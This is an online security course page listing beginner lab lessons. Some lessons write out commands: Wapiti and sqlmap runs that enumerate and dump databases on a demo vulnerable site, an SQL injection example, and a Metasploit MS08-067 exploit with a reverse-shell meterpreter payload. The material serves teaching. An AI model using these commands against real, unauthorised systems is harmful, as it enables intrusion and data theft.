Beginner's Course in System Security & Digital Forensics..
- Description
- Curriculum
- FAQ
- Reviews
Hello Everyone, I am Assistant Professor Mr. Sridhar Iyer, working with the University of Mumbai for the last 7 years. I always believe in “Sharing Knowledge”.
I am rolling out a series of Video Tutorial Hands-On sessions on upcoming technologies and academic subjects based on my expertise and comfort.
I am beginning with lab sessions on a fairly new subject “Advanced System Security and Digital Forensics”. I am a Certified Ethical Hacker by E.C. Council USA and have my core expertise in Cryptography and System Security.
I believe in sharing whatever knowledge and experience I have gained so far in my short but sweet stint as a Teacher.
I hope this series of lectures and lab sessions help you learn something useful and interesting.
-
6Wapiti Part1Video lesson
Aim : Explore Web application vulnerabilities using Wapiti Wapiti allows you to audit the security of your websites or web applications. It performs "black-box" scans (it does not study the source code) of the web application by crawling the WebPages of the deployed webapp, looking for scripts and forms where it can inject data. Once it gets the list of URLs, forms and their inputs, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable.
-
7Wapiti Part 2Video lesson
Steps
1. Open Anaconda Prompt
2. pip install wapiti3
3. wapiti --list
4. wapiti -u http://testphp.vulnweb.com/
-
8SQLMap Part 1Video lesson
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application's database server. The vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities.
Example "SELECT name FROM user where username = '" + username + "' and password = '" + password + "'";
Normal Scenario "SELECT name FROM user where username = ' " + username + " ' and password = ' " + password + " ' ";
Vulnerable Scenario "SELECT name FROM user where username = ' " + username + " ' and password = ' " unknown' or '1'='1" '";
-
9SQLMap Part 2Video lesson
Steps
1. $ sudo apt-get install sqlmap ( for linux )
2. $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
3. $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D "databaseName" -- tables
4. $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D "databaseName" -T "TableName" --columns
5. $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D "databaseName" -T "TableName" -C "ColumnName" -- dump
-
10SQLiLABSVideo lesson
-
11Metasploit Part 1Video lesson
In this section we’ll walk you through the act of exploiting a live install of Windows XP Service Pack 3. We’ll make use of the well known vulnerability in the netapi32.dll in the Windows Operating System.
The vulnerability is in fact very dangerous because the attacker is not required to authenticate to the target machine prior to running the attack.
-
12Metasploit Part 2Video lesson
Steps
1. Choosing and configuring an exploit
(code that enters a target system by taking advantage of one of its bugs)
2. Choosing and configuring a payload
(code that will be executed on the target system upon successful entry)
3. Executing the exploit.
COMMANDS:
1. service postgresql start
2. msfconsole
3. show exploits
4. use windows/smb/ms08_067_netapi
5. show options
6. set RHOST "Victim's IP"
7. set payload windows/meterpreter/reverse_tcp
8. set LHOST "Your IP"
9. exploit
10. "Yippee You are inside th victim's machine"
pwd, mkdir, cat
-
13Introduction to Packet SniffingVideo lesson
-
14Packet Sniffing Using WiresharkVideo lesson
-
15Introduction to ARP SpoofingVideo lesson
-
16ARP Spoofing/Poisoning using EttercapVideo lesson
-
17Part 1: Routing Information Protocol (RIP)Video lesson
Steps:
1. Create the network in CPT as per the diagram.
2. Apply Routing Information Protocol (RIP)
3. Create Access Control Lists (ACL)
4. Create a Virtual LAN (VLAN).
-
18Part 2 : Access Control Lists (ACL)Video lesson
Steps:
1. Create the network in CPT as per the diagram.
2. Apply Routing Information Protocol (RIP)
3. Create Access Control Lists (ACL)
4. Create a Virtual LAN (VLAN). ACCESS LISTS :
1. Standard Access List (1-99) Applied Closest to the destination
2. Extended Access List (100-199) Applied Closest to the source
-
19Part 3: Virtual LAN (VLAN)Video lesson
1. Create 3 VLANS ( Vlan 10 Vlan 20, Vlan 30)
2. Switch 2 - Vlan 20
name sales
exit
Vlan 30
name sales
exit
int fa0/1
switchport access vlan20
exit
int fa0/2
switchport access vlan20
exit
int fa0/3
switchport access vlan30
exit
int fa0/4
switchport access vlan30
exit
External Links May Contain Affiliate Links read more